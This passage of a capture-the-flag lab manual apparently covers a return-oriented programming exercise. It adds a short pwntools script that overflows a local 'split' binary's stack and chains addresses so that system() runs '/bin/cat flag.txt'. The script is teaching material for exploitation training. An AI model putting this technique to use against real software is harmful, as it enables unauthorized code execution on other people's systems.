cheese-hub/ROP-Attack/manual.md

 Now we try to make an overflow and return to the address of system function after that and try to exec the system function with the parameter /bin/cat flag.txt

+## Build and Analyze the code
+from pwn import *

+# create a process object and load the executable binary
+p = process('./split')

+# determine the offset to the return address on the stack
+offset = 40

+# retrieve the addresses of the desired functions/strings using the ELF object
+ret_address = 0x00000000004007c3

+# construct the payload by padding the offset with arbitrary characters
+# then appending the address of the return instruction and the address of the system call with the argument of the flag file
+payload = b'A' * offset + p64(ret_address) + p64(0x00601060) + p64(0x0040074b)

+# send the payload to the process and get the result
+p.sendline(payload)
+p.interactive()

 ## Catch the Flag!!